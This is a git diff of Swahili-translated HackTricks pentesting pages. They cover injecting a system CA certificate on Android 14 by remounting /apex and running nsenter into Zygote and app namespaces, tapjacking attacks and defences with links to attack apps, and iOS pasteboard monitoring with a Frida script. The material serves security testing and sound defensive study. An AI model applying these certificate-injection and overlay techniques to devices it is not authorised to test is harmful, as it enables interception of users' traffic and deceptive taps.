|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (52).png" alt="" width="345"><figcaption></figcaption></figure>
|
||||
|
||||
* Baada ya kuanza upya, nenda kwa `Imaniwa` -> `SYSTEM` na hakikisha cheti cha Postswigger kipo
|
||||
* Baada ya kuanza upya, nenda kwa `Imani credentials` -> `SYSTEM` na hakikisha cheti cha Postswigger kipo
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (53).png" alt="" width="314"><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -76,7 +81,7 @@ Jaribio la kurekebisha njia ya **APEX cacerts** ili iweze kuandikwa linakutana n
|
|||
|
||||
Uanzishaji wa Android unajumuisha mchakato wa `init`, ambao, baada ya kuanza mfumo wa uendeshaji, pia huanzisha mchakato wa Zygote. Mchakato huu unahusika na kuzindua michakato ya programu na uwanja mpya wa mlima ambao una pamoja na mlima wa kibinafsi wa **`/apex`**, hivyo kufanya mabadiliko kwenye folda hii kuwa tofauti na michakato mingine.
|
||||
|
||||
Hata hivyo, njia mbadala ipo kwa wale wanaohitaji kuhariri vyeti vya CA vilivyothibitishwa na mfumo ndani ya folda ya **`/apex`**. Hii inahusisha kurekebisha kwa mkono mlima wa **`/apex`** ili kuondoa PROPAGATION ya KIBINAFSI, hivyo kuifanya iweze kuandikwa. Mchakato huu unajumuisha kunakili maudhui ya **`/apex/com.android.conscrypt`** kwenda mahali pengine, kufuta folda ya **`/apex/com.android.conscrypt`** ili kuondoa kizuizi cha kusoma tu, na kisha kurudisha maudhui kwenye eneo lao la asili ndani ya **`/apex`**. Hatua hii inahitaji hatua za haraka ili kuepuka kuharibika kwa mfumo. Ili kuhakikisha matumizi ya mabadiliko haya kote kwenye mfumo, ni vyema kuanzisha upya `system_server`, ambayo kimsingi inaanzisha upya programu zote na kuleta mfumo katika hali thabiti.
|
||||
Hata hivyo, njia mbadala ipo kwa wale wanaohitaji kuhariri vyeti vya CA vilivyothibitishwa na mfumo ndani ya folda ya **`/apex`**. Hii inahusisha kurekebisha kwa mkono **`/apex`** ili kuondoa PROPAGATION ya KIBINAFSI, hivyo kuifanya iweze kuandikwa. Mchakato huu unajumuisha kunakili maudhui ya **`/apex/com.android.conscrypt`** kwenda eneo lingine, kufuta folda ya **`/apex/com.android.conscrypt`** ili kuondoa kizuizi cha kusoma tu, na kisha kurudisha maudhui kwenye eneo lao la asili ndani ya **`/apex`**. Hatua hii inahitaji hatua za haraka ili kuepuka kuharibika kwa mfumo. Ili kuhakikisha matumizi ya mabadiliko haya kote kwenye mfumo, inashauriwa kuanzisha upya `system_server`, ambayo kimsingi inaanzisha upya programu zote na kuleta mfumo katika hali thabiti.
|
||||
```bash
|
||||
# Create a separate temp directory, to hold the current certificates
|
||||
# Otherwise, when we add the mount we can't read the current certs anymore.
|
||||
|
@ -136,7 +141,7 @@ echo "System certificate injected"
|
|||
```
|
||||
### Kufunga kupitia NSEnter
|
||||
|
||||
1. **Kuanzisha Daktari wa Kuandika**: Kwanza, daktari wa kuandika unawekwa kwa kufunga `tmpfs` juu ya daktari wa sasa wa cheti wa mfumo usio wa APEX. Hii inafanikiwa kwa amri ifuatayo:
|
||||
1. **Kuanzisha Daktari wa Kuandika**: Kwanza, daktari wa kuandika unawekwa kwa kufunga `tmpfs` juu ya daktari wa vyeti wa mfumo wa sasa usio wa APEX. Hii inafanikiwa kwa amri ifuatayo:
|
||||
```bash
|
||||
mount -t tmpfs tmpfs /system/etc/security/cacerts
|
||||
```
|
||||
|
@ -147,12 +152,30 @@ nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/securi
|
|||
```
|
||||
Hii inahakikisha kuwa kila programu mpya iliyozinduliwa itazingatia usanidi wa vyeti vya CA uliyo boreshwa.
|
||||
|
||||
4. **Kuomba Mabadiliko kwa Programu Zinazoendeshwa**: Ili kutumia mabadiliko kwa programu zinazoendeshwa tayari, `nsenter` inatumika tena kuingia kwenye anga za kila programu kwa kujitegemea na kufanya bind mount kama hiyo. Amri inayohitajika ni:
|
||||
4. **Kutekeleza Mabadiliko kwa Programu Zinazoendeshwa**: Ili kutumia mabadiliko kwa programu zinazoendeshwa tayari, `nsenter` inatumika tena kuingia kwenye kila eneo la programu binafsi na kufanya bind mount kama hiyo. Amri inayohitajika ni:
|
||||
```bash
|
||||
nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
|
||||
```
|
||||
5. **Njia Mbadala - Kuanzisha Upya Kwa Programu**: Mbinu mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na kuanzisha upya laini wa mfumo wa uendeshaji kwa kutumia amri za `stop && start`. Mbinu hii itasambaza mabadiliko kote kwenye maeneo ya majina, ikiepuka haja ya kushughulikia kila programu inayotumika kwa kujitegemea. Hata hivyo, mbinu hii kwa ujumla haipendelewi sana kutokana na usumbufu wa kuanzisha upya.
|
||||
5. **Njia Mbadala - Kuzindua Upya Kwa Programu**: Mbinu mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na kuzindua upya laini wa mfumo wa uendeshaji kwa kutumia amri za `stop && start`. Mbinu hii itasambaza mabadiliko katika maeneo yote, ikiepuka haja ya kushughulikia kila programu inayotumika kwa kujitegemea. Hata hivyo, mbinu hii kwa ujumla haipendelewi sana kutokana na usumbufu wa kuzindua upya.
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,41 +2,46 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
## **Maelezo Muhimu**
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Tapjacking** ni shambulio ambapo **programu mbaya** inazinduliwa na **kujipanga juu ya programu ya mwathiriwa**. Mara tu inapoficha programu ya mwathiriwa, kiolesura chake cha mtumiaji kimeundwa kwa njia ambayo inadanganya mtumiaji kuinteract nayo, wakati inapitisha mwingiliano kwa programu ya mwathiriwa.\
|
||||
Kimsingi, inamfanya mtumiaji **ashindwe kujua kuwa anatekeleza vitendo kwenye programu ya mwathiriwa**.
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
|
||||
## **Maelezo Msingi**
|
||||
|
||||
**Tapjacking** ni shambulio ambapo **programu mbaya** inazinduliwa na **kujipanga juu ya programu ya mwathiriwa**. Mara tu inapofunika programu ya mwathiriwa kwa uwazi, kiolesura chake cha mtumiaji kimeundwa kwa njia ambayo inadanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano kwa programu ya mwathiriwa.\
|
||||
Kimsingi, inamfanya mtumiaji **ashindwe kujua kwamba wanatekeleza vitendo kwenye programu ya mwathiriwa**.
|
||||
|
||||
### Uchunguzi
|
||||
|
||||
Ili kugundua programu zinazoweza kuwa hatarini kwa shambulio hili, unapaswa kutafuta **aktiviti zilizotolewa** kwenye mwongozo wa android (kumbuka kuwa aktiviti yenye intent-filter inatolewa kiotomatiki kwa chaguo-msingi). Mara baada ya kupata aktiviti zilizotolewa, **angalia ikiwa zinahitaji idhini yoyote**. Hii ni kwa sababu **programu mbaya itahitaji idhini hiyo pia**.
|
||||
Ili kugundua programu zinazoweza kuathiriwa na shambulio hili unapaswa kutafuta **shughuli zilizotolewa** kwenye mizizi ya android (kumbuka kwamba shughuli yenye intent-filter inaendelea kutolewa kwa chaguo-msingi). Mara baada ya kupata shughuli zilizotolewa, **angalia kama zinahitaji idhini yoyote**. Hii ni kwa sababu **programu mbaya itahitaji idhini hiyo pia**.
|
||||
|
||||
### Ulinzi
|
||||
### Kinga
|
||||
|
||||
#### Android 12 (API 31,32) na zaidi
|
||||
|
||||
[**Kulingana na chanzo hiki**](https://www.geeksforgeeks.org/tapjacking-in-android/)**,** mashambulio ya tapjacking yamezuiliwa moja kwa moja na Android kutoka Android 12 (API 31 & 30) na zaidi. Kwa hivyo, hata kama programu ina hatari, **hutaweza kuitumia**.
|
||||
[Kulingana na chanzo hiki](https://www.geeksforgeeks.org/tapjacking-in-android/), mashambulio ya tapjacking yanazuiliwa moja kwa moja na Android kutoka Android 12 (API 31 & 30) na zaidi. Kwa hivyo, hata kama programu inaweza kuathiriwa hutoweza **kuitumia**.
|
||||
|
||||
#### `filterTouchesWhenObscured`
|
||||
|
||||
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`kweli`**, `View` haitapokea mwingiliano wowote wakati dirisha la tazama linapofichwa na dirisha lingine linaloonekana.
|
||||
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`kweli`**, `View` haitapokea kugusa wakati dirisha la maoni linapofunikwa na dirisha lingine linaloonekana.
|
||||
|
||||
#### **`setFilterTouchesWhenObscured`**
|
||||
|
||||
Sifa ya **`setFilterTouchesWhenObscured`** ikiwekwa kuwa kweli pia inaweza kuzuia kutumia udhaifu huu ikiwa toleo la Android ni la chini.\
|
||||
Ikiwekwa kuwa **`kweli`**, kwa mfano, kitufe kinaweza **kuzimwa moja kwa moja ikiwa kimefichwa**:
|
||||
Sifa ya **`setFilterTouchesWhenObscured`** ikiwekwa kuwa kweli inaweza pia kuzuia kutumia udhaifu huu ikiwa toleo la Android ni la chini.\
|
||||
Ikiwekwa kuwa **`kweli`**, kwa mfano, kitufe kinaweza **kulemazwa moja kwa moja ikiwa kimefunikwa**:
|
||||
```xml
|
||||
<Button android:text="Button"
|
||||
android:id="@+id/button1"
|
||||
|
@ -49,38 +54,28 @@ android:filterTouchesWhenObscured="true">
|
|||
|
||||
### Tapjacking-ExportedActivity
|
||||
|
||||
Programu ya hivi karibuni ya Android inayotekeleza shambulio la Tapjacking (+ kuita kabla ya shughuli iliyotolewa ya programu iliyoshambuliwa) inaweza kupatikana hapa: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
|
||||
**Programu ya hivi karibuni ya Android** inayotekeleza shambulio la Tapjacking (+ kuita kabla ya shughuli iliyotolewa ya programu iliyoshambuliwa) inaweza kupatikana hapa: [**https://github.com/carlospolop/Tapjacking-ExportedActivity**](https://github.com/carlospolop/Tapjacking-ExportedActivity).
|
||||
|
||||
Fuata maagizo ya **README ili kuitumia**.
|
||||
Fuata **maagizo ya README** ili kutumia.
|
||||
|
||||
### FloatingWindowApp
|
||||
|
||||
Mradi wa mfano unaoanzisha **FloatingWindowApp**, ambayo inaweza kutumika kuweka juu ya shughuli zingine ili kutekeleza shambulio la clickjacking, unaweza kupatikana hapa [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (kidogo ni mzee, bahati njema kujenga apk).
|
||||
Mradi wa mfano unaoendeleza **FloatingWindowApp**, ambao unaweza kutumika kuweka juu ya shughuli zingine kutekeleza shambulio la clickjacking, unaweza kupatikana hapa [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (kidogo umri, bahati njema kujenga apk).
|
||||
|
||||
### Qark
|
||||
|
||||
{% hint style="danger" %}
|
||||
Inaonekana kama mradi huu sasa hauna msaada na kazi hii haifanyi kazi vizuri tena
|
||||
Inaonekana kama mradi huu sasa hauendelezwi tena na hii kazi haifanyi kazi ipasavyo tena
|
||||
{% endhint %}
|
||||
|
||||
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu mbaya ya kujaribu kwa uwezekano wa udhaifu wa **Tapjacking**.\
|
||||
Unaweza kutumia [**qark**](https://github.com/linkedin/qark) na vigezo `--exploit-apk` --sdk-path `/Users/username/Library/Android/sdk` ili kuunda programu yenye nia mbaya kufanya majaribio ya uwezekano wa udhaifu wa **Tapjacking**.
|
||||
|
||||
Kupunguza hatari ni rahisi kwa sababu msanidi programu anaweza kuchagua kutokupokea matukio ya kugusa wakati mtazamo unafunikwa na mwingine. Kutumia [Marejeleo ya Msanidi Programu ya Android](https://developer.android.com/reference/android/view/View#security):
|
||||
Kupunguza hatari ni rahisi kwa sababu mwandishi wa programu anaweza kuchagua kutokupokea matukio ya kugusa wakati maoni yanafunikwa na mengine. Kutumia [Marejeleo ya Developer wa Android](https://developer.android.com/reference/android/view/View#security):
|
||||
|
||||
> Mara nyingi ni muhimu kwamba programu iweze kuthibitisha kuwa hatua inatekelezwa kwa ufahamu kamili na ridhaa ya mtumiaji, kama vile kutoa ombi la idhini, kufanya ununuzi au bonyeza tangazo. Kwa bahati mbaya, programu mbaya inaweza kujaribu kudanganya mtumiaji kutekeleza hatua hizi, bila kujua, kwa kuficha kusudi halisi la mtazamo. Kama tiba, mfumo hutoa kifaa cha kuchuja kugusa ambacho kinaweza kutumika kuboresha usalama wa maoni yanayotoa ufikiaji wa kazi nyeti.
|
||||
> Mara kwa mara ni muhimu kwamba programu iweze kuthibitisha kwamba hatua inafanywa kwa idhini kamili ya mtumiaji, kama vile kutoa ombi la idhini, kufanya ununuzi au bonyeza tangazo. Kwa bahati mbaya, programu inayoweza kudhuru inaweza kujaribu kudanganya mtumiaji kufanya hatua hizi, bila kujua, kwa kuficha lengo la maoni. Kama tiba, mfumo hutoa mbinu ya kuchuja kugusa ambayo inaweza kutumika kuboresha usalama wa maoni yanayotoa ufikiaji wa kazi nyeti.
|
||||
>
|
||||
> Ili kuwezesha kuchuja kugusa, piga [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Wakati inapowezeshwa, mfumo utaondoa kugusa zinazopokelewa wakati dirisha la mtazamo linazibwa na dirisha lingine linaloonekana. Kama matokeo, mtazamo hautapokea kugusa wakati popo, dirisha la mazungumzo au dirisha lingine linaonekana juu ya dirisha la mtazamo.
|
||||
> Ili kuwezesha kuchuja kugusa, piga simu [`setFilterTouchesWhenObscured(boolean)`](https://developer.android.com/reference/android/view/View#setFilterTouchesWhenObscured%28boolean%29) au weka sifa ya mpangilio ya android:filterTouchesWhenObscured kuwa kweli. Ikiwa imeanzishwa, mfumo utatupa kugusa zinazopokelewa wakati wowote dirisha la maoni linafunikwa na dirisha lingine linaloonekana. Kama matokeo, maoni hayatapokea kugusa wakati wowote toast, dirisha au dirisha lingine linaonekana juu ya dirisha la maoni.
|
||||
|
||||
<details>
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
|
|
@ -1,51 +1,56 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
Kushiriki data ndani na kati ya programu kwenye vifaa vya iOS kunawezeshwa na mfumo wa [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambao umegawanywa katika makundi mawili kuu:
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
- **Ubao wa kunakili wa mfumo**: Hii hutumiwa kushiriki data na **programu yoyote** na imeundwa kuhifadhi data hata baada ya kuanza upya kwa kifaa au kuondolewa kwa programu, kipengele ambacho kimekuwepo tangu iOS 10.
|
||||
- **Ubao wa desturi / wenye jina**: Hizi ni maalum kwa kushiriki data **ndani ya programu au na programu nyingine** ambazo zinashiriki kitambulisho cha timu sawa, na hazijaundwa kuhifadhiwa zaidi ya muda wa maisha wa mchakato wa programu inayozitengeneza, kufuatia mabadiliko yaliyofanywa katika iOS 10.
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
**Uzingatiaji wa usalama** unacheza jukumu muhimu wakati wa kutumia ubao wa kunakili. Kwa mfano:
|
||||
- Hakuna mfumo wa watumiaji kusimamia ruhusa za programu kupata **ubao wa kunakili**.
|
||||
|
||||
Kugawana data ndani na kati ya programu kwenye vifaa vya iOS hufacilitated na mbinu ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
|
||||
|
||||
- **Ubao wa kunakili wa mfumo mzima**: Hii hutumika kwa kugawana data na **programu yoyote** na imeundwa kudumu data hata baada ya kuanzisha upya kifaa au kuondoa programu, kipengele ambacho kimekuwepo tangu iOS 10.
|
||||
- **Ubao wa kunakili wa desturi / wenye majina**: Hizi ni maalum kwa kugawana data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho cha timu sawa, na hazijabuniwa kudumu zaidi ya maisha ya mchakato wa programu inayounda, ikifuata mabadiliko yaliyoletwa katika iOS 10.
|
||||
|
||||
**Mambo ya kuzingatia kiusalama** yanacheza jukumu muhimu wakati wa kutumia ubao wa kunakili. Kwa mfano:
|
||||
- Hakuna mbinu ya watumiaji kusimamia ruhusa za programu kupata **ubao wa kunakili**.
|
||||
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa ubao wa kunakili, upatikanaji umefungwa wakati programu iko mbele (tangu iOS 9).
|
||||
- Matumizi ya ubao wa desturi wenye jina la kudumu yanapendekezwa badala ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
|
||||
- Kipengele cha **Ubao wa Kielelezo** kilicholetwa na iOS 10, kinachoruhusu yaliyomo kushirikiwa kati ya vifaa kupitia ubao wa kunakili wa mfumo, kinaweza kusimamiwa na watengenezaji ili kuweka muda wa kumalizika kwa data na kuzima uhamishaji wa yaliyomo kiotomatiki.
|
||||
- Matumizi ya ubao wa kunakili ulio na jina la kudumu yanapendekezwa badala ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
|
||||
- Kipengele cha **Ubao wa Kielelezo** kilicholetwa na iOS 10, kuruhusu yaliyomo kugawanywa kati ya vifaa kupitia ubao wa kunakili wa jumla, kinaweza kusimamiwa na watengenezaji kuweka muda wa kumalizika kwa data na kulemaza uhamishaji wa yaliyomo kiotomatiki.
|
||||
|
||||
Kuhakikisha kuwa **habari nyeti haifadhiwi kwa bahati mbaya** kwenye ubao wa kunakili wa kawaida ni muhimu. Aidha, programu zinapaswa kuundwa kuzuia matumizi mabaya ya data ya ubao wa kunakili wa kawaida kwa hatua zisizokusudiwa, na watengenezaji wanahimizwa kutekeleza hatua za kuzuia nakala ya habari nyeti kwenye ubao wa kunakili.
|
||||
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi kimakosa** kwenye ubao wa kunakili wa jumla ni muhimu. Aidha, programu zinapaswa kuundwa kuzuia matumizi mabaya ya data ya ubao wa kunakili wa jumla kwa hatua zisizokusudiwa, na watengenezaji wanahimizwa kutekeleza hatua za kuzuia kunakili wa taarifa nyeti kwenye ubao wa kunakili.
|
||||
|
||||
### Uchambuzi Statisa
|
||||
### Uchambuzi Stahiki
|
||||
|
||||
Kwa uchambuzi statisa, tafuta msimbo wa chanzo au faili ya binary kwa:
|
||||
- `generalPasteboard` ili kutambua matumizi ya **ubao wa kunakili wa mfumo**.
|
||||
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **ubao wa kunakili wa desturi**. Thibitisha ikiwa kuna uwezo wa kuhifadhi, ingawa hii imepitwa na wakati.
|
||||
Kwa uchambuzi stahiki, tafuta msimbo wa chanzo au binary kwa:
|
||||
- `generalPasteboard` kutambua matumizi ya **ubao wa kunakili wa mfumo mzima**.
|
||||
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **ubao wa kunakili wa desturi**. Thibitisha ikiwa kudumu kumewezeshwa, ingawa hii imepitwa na wakati.
|
||||
|
||||
### Uchambuzi wa Kudumu
|
||||
|
||||
Uchambuzi wa kudumu unahusisha kufunga au kufuatilia njia maalum:
|
||||
- Fuatilia `generalPasteboard` kwa matumizi ya mfumo kwa ujumla.
|
||||
- Angalia `generalPasteboard` kwa matumizi ya mfumo mzima.
|
||||
- Fuatilia `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa utekelezaji wa desturi.
|
||||
- Angalia wito wa njia iliyopitwa na wakati ya `setPersistent:` ili kuchunguza mipangilio ya kuhifadhi.
|
||||
- Angalia wito wa mbinu iliyopitwa na wakati ya `setPersistent:` kuthibitisha mipangilio ya kudumu.
|
||||
|
||||
Maelezo muhimu ya kufuatilia ni pamoja na:
|
||||
- **Majina ya ubao wa kunakili** na **yaliyomo** (kwa mfano, angalia herufi, URL, picha).
|
||||
- **Majina ya ubao wa kunakili** na **maudhui** (kwa mfano, kuangalia herufi, URL, picha).
|
||||
- **Idadi ya vitu** na **aina za data** zilizopo, kwa kutumia ukaguzi wa aina za data za kawaida na desturi.
|
||||
- **Chaguo za muda wa kumalizika na za ndani pekee** kwa kuchunguza njia ya `setItems:options:`.
|
||||
- **Muda wa kumalizika na chaguzi za ndani-pekee** kwa kupekua mbinu ya `setItems:options:`.
|
||||
|
||||
Mfano wa matumizi ya zana ya ufuatiliaji ni **ufuatiliaji wa ubao wa kunakili wa objection**, ambao unauliza generalPasteboard kila baada ya sekunde 5 kwa mabadiliko na kutoa matokeo ya data mpya.
|
||||
Mfano wa matumizi ya zana ya ufuatiliaji ni **objection's pasteboard monitor**, ambayo inachunguza ubao wa kunakili wa mfumo mzima kila sekunde 5 kwa mabadiliko na kutoa data mpya.
|
||||
|
||||
Hapa kuna mfano rahisi wa skripti ya JavaScript, iliyohamasishwa na njia ya objection, ya kusoma na kurekodi mabadiliko kutoka kwenye ubao wa kunakili kila baada ya sekunde 5:
|
||||
Hapa kuna mfano wa skripti rahisi ya JavaScript, iliyochochewa na njia ya objection, kusoma na kurekodi mabadiliko kutoka kwenye ubao wa kunakili kila sekunde 5:
|
||||
```javascript
|
||||
const UIPasteboard = ObjC.classes.UIPasteboard;
|
||||
const Pasteboard = UIPasteboard.generalPasteboard();
|
||||
|
@ -75,16 +80,21 @@ console.log(items);
|
|||
